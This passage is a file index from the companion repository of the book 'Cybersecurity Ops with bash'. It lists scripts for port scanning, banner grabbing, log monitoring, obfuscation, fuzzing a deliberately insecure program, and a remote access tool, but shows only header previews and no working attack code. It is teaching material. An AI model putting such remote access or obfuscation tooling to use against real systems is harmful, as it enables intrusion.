"path": "ch08/tailcount.sh",
"chars": 475,
"preview": "#!/bin/bash -\n#\n# Cybersecurity Ops with bash\n# tailcount.sh\n#\n# Description: \n# Count lines every n seconds\n#\n# Usage: "
},
{
"path": "ch08/wintail.sh",
"chars": 472,
"preview": "#!/bin/bash -\n#\n# Cybersecurity Ops with bash\n# wintail.sh\n#\n# Description: \n# Perform a tail-like function on a Windows"
},
{
"path": "ch09/autoscan.sh",
"chars": 793,
"preview": "#!/bin/bash -\n#\n# Cybersecurity Ops with bash\n# autoscan.sh\n#\n# Description: \n# Automatically performs a port scan (usin"
},
{
"path": "ch09/fd2.sh",
"chars": 1597,
"preview": "#!/bin/bash -\n#\n# Cybersecurity Ops with bash\n# fd2.sh\n#\n# Description: \n# Compares two port scans to find changes\n# MAJ"
},
{
"path": "ch09/scan.sh",
"chars": 998,
"preview": "#!/bin/bash -\n#\n# Cybersecurity Ops with bash\n# scan.sh\n#\n# Description: \n# Perform a port scan of a specified host\n#\n# "
},
{
"path": "ch10/baseline.sh",
"chars": 2642,
"preview": "#!/bin/bash\n\n# baseline.sh - compare baselines\n# and report on differences\n#\n\nfunction usageErr ()\n{\n ec"
},
{
"path": "ch11/Calc_VT.txt",
"chars": 6873,
"preview": "{\"scans\": {\"Bkav\": {\"detected\": false, \"version\": \"1.3.0.9466\", \"result\": null, \"update\": \"20180712\"}, \"MicroWorld-eScan"
},
{
"path": "ch11/WannaCry_VT.txt",
"chars": 8205,
"preview": "{\"scans\": {\"Bkav\": {\"detected\": true, \"version\": \"1.3.0.9466\", \"result\": \"W32.WannaCrypLTE.Trojan\", \"update\": \"20180712\""
},
{
"path": "ch11/helloworld.c",
"chars": 75,
"preview": "#include <stdio.h>\n\nint main()\n{\n printf(\"Hello World!\\n\");\n return 0;\n}\n"
},
{
"path": "ch11/vtjson.awk",
"chars": 720,
"preview": "# Cybersecurity Ops with bash\n# vtjson.awk\n#\n# Description: \n# Search a JSON file for VirusTotal malware hits\n#\n# Usage:"
},
{
"path": "ch11/vtjson.sh",
"chars": 791,
"preview": "#!/bin/bash -\n#\n# Rapid Cybersecurity Ops\n# vtjson.sh\n#\n# Description: \n# Search a JSON file for VirusTotal malware hits"
},
{
"path": "ch12/tagit.sh",
"chars": 251,
"preview": "#!/bin/bash -\n#\n# Cybersecurity Ops with bash\n# tagit.sh\n#\n# Description: \n# Place open and close tags around a string\n#"
},
{
"path": "ch12/webdash.sh",
"chars": 2256,
"preview": "#!/bin/bash -\n#\n# Rapid Cybersecurity Ops\n# webdash.sh\n#\n# Description: \n# Create an information dashboard\n# Heading\n# -"
},
{
"path": "ch12/weblogfmt.sh",
"chars": 1003,
"preview": "#!/bin/bash -\n#\n# Cybersecurity Ops with bash\n# weblogfmt.sh\n#\n# Description: \n# Read in Apache web log and output as HT"
},
{
"path": "ch13/bannergrabber.sh",
"chars": 1453,
"preview": "#!/bin/bash -\n#\n# Cybersecurity Ops with bash\n# bannergrabber.sh\n#\n# Description:\n# Automatically pull the banners from "
},
{
"path": "ch13/smtpconnect.sh",
"chars": 264,
"preview": "#!/bin/bash -\n#\n# Cybersecurity Ops with bash\n# smtpconnect.sh\n#\n# Description: \n# Connect to a SMTP server and print we"
},
{
"path": "ch14/askey.sh",
"chars": 550,
"preview": "\n# functions to convert decimal to ascii and vice-versa\n\n# aschar - print the ascii character representation\n# "
},
{
"path": "ch14/innerscript.sh",
"chars": 68,
"preview": "echo \"This is an encrypted script\"\necho \"running uname -a\"\nuname -a\n"
},
{
"path": "ch14/logfuscate.sh",
"chars": 363,
"preview": "#!/bin/bash -\n#\n# Cybersecurity Ops with bash\n# logfuscate.sh\n#\n# Description: \n# Demonstration of logic obfuscation\n#\n\n"
},
{
"path": "ch14/oneline.sh",
"chars": 244,
"preview": "#!/bin/bash -\n#\n# Cybersecurity Ops with bash\n# oneline.sh\n#\n# Description: \n# Demonstration of one-line script obfuscat"
},
{
"path": "ch14/readable.sh",
"chars": 235,
"preview": "#!/bin/bash -\n#\n# Cybersecurity Ops with bash\n# readable.sh\n#\n# Description: \n# Simple script to be obfuscated\n#\n\nif [[ "
},
{
"path": "ch14/streamcipher.sh",
"chars": 1768,
"preview": "#!/bin/bash -\n#\n# Cybersecurity Ops with bash\n# streamcipher.sh\n#\n# Description: \n# A lightweight implementation of a st"
},
{
"path": "ch14/synfuscate.sh",
"chars": 234,
"preview": "#!/bin/bash -\n#\n# Cybersecurity Ops with bash\n# synfuscate.sh\n#\n# Description: \n# Demonstration of syntax script obfusca"
},
{
"path": "ch14/wrapper.sh",
"chars": 488,
"preview": "#!/bin/bash -\n#\n# Cybersecurity Ops with bash\n# wrapper.sh\n#\n# Description: \n# Example of executing an encrypted \"wrappe"
},
{
"path": "ch15/fuzzer.sh",
"chars": 1315,
"preview": "#!/bin/bash -\n#\n# Cybersecurity Ops with bash\n# fuzzer.sh\n#\n# Description: \n# Fuzz a specified argument of a program\n#\n#"
},
{
"path": "ch15/fuzzme.c",
"chars": 366,
"preview": "#include <stdio.h>\n#include <string.h>\n\n//Cybersecurity Ops with bash\n//Warning - This is an insecure program and is for"
},
{
"path": "ch16/LocalRat.sh",
"chars": 890,
"preview": "#!/bin/bash -\n#\n# Cybersecurity Ops with bash\n# LocalRat.sh\n#\n# Description: \n# Remote access tool to be on a local syst"
},
{
"path": "ch16/RemoteRat.sh",
"chars": 1373,
"preview": "#!/bin/bash -\n#\n# Cybersecurity Ops with bash\n# RemoteRat.sh\n#\n# Description: \n# Remote access tool to be run on the rem"
},
{
"path": "ch19/pingmonitor.sh",
"chars": 875,
"preview": "#!/bin/bash -\n#\n# Cybersecurity Ops with bash\n# pingmonitor.sh\n#\n# Description: \n# Use ping to monitor host availability"
},
{
"path": "ch20/softinv.sh",
"chars": 927,
"preview": "#!/bin/bash -\n#\n# Cybersecurity Ops with bash\n# softinv.sh\n#\n# Description: \n# list the software installed on a system\n#"
},
{
"path": "ch21/test.input",
"chars": 212,
"preview": "file ./TODO.txt\n!file ./validate.sh\n!file nogo.sh\nuser albing\n!user bob\ngroup mysql\n!group skip\nhash a7f36f4519661cf2a"
},
{
"path": "ch21/validateconfig.sh",
"chars": 2812,
"preview": "#!/bin/bash -\n#\n# Cybersecurity Ops with bash\n# validateconfig.sh\n#\n# Description: \n# Validate a specified configuration"
},
{
"path": "ch22/checkemail.1liner",
"chars": 444,
"preview": "#!/bin/bash\n#\n# checkemail.sh - check an email address against\n# the Have I Been Pwned? database\n#\t\t in"
},
{
"path": "ch22/checkemail.sh",
"chars": 607,
"preview": "#!/bin/bash -\n#\n# Cybersecurity Ops with bash\n# checkemail.sh\n#\n# Description: \n# check an email address against the\n# H"
},
{
"path": "ch22/checkemailAlt.sh",
"chars": 614,
"preview": "#!/bin/bash\n#\n# checkemail.sh - check an email address against\n# the Have I Been Pwned? database\n#\n\nif ("
},
{
"path": "ch22/checkpass.sh",
"chars": 878,
"preview": "#!/bin/bash -\n#\n# Cybersecurity Ops with bash\n# checkpass.sh\n#\n# Description: \n# Check a password against the\n# Have I B"
},
{
"path": "ch22/emailbatch.sh",
"chars": 477,
"preview": "#!/bin/bash -\n#\n# Cybersecurity Ops with bash\n# emailbatch.sh\n#\n# Description: \n# Read in a file of email addresses and "
},
{
"path": "readme.txt",
"chars": 1470,
"preview": "Cybersecurity Ops with bash\nAttack, Defend, and Analyze from the Command Line\n------------------------------------------"
}
]
About this extraction
This page contains the full source code of the cybersecurityops/cyber-ops-with-bash GitHub repository, extracted and formatted as plain text for AI agents and large language models (LLMs). The extraction includes 71 files (123.7 KB), approximately 50.7k tokens, and a symbol index with 2 extracted functions, classes, methods, constants, and types. Use this with OpenClaw, Claude, ChatGPT, Cursor, Windsurf, or any other AI tool that accepts text input. You can copy the full output to your clipboard or download it as a .txt file.
Extracted by GitExtract — free GitHub repo to text converter for AI. Built by Nikandr Surkov.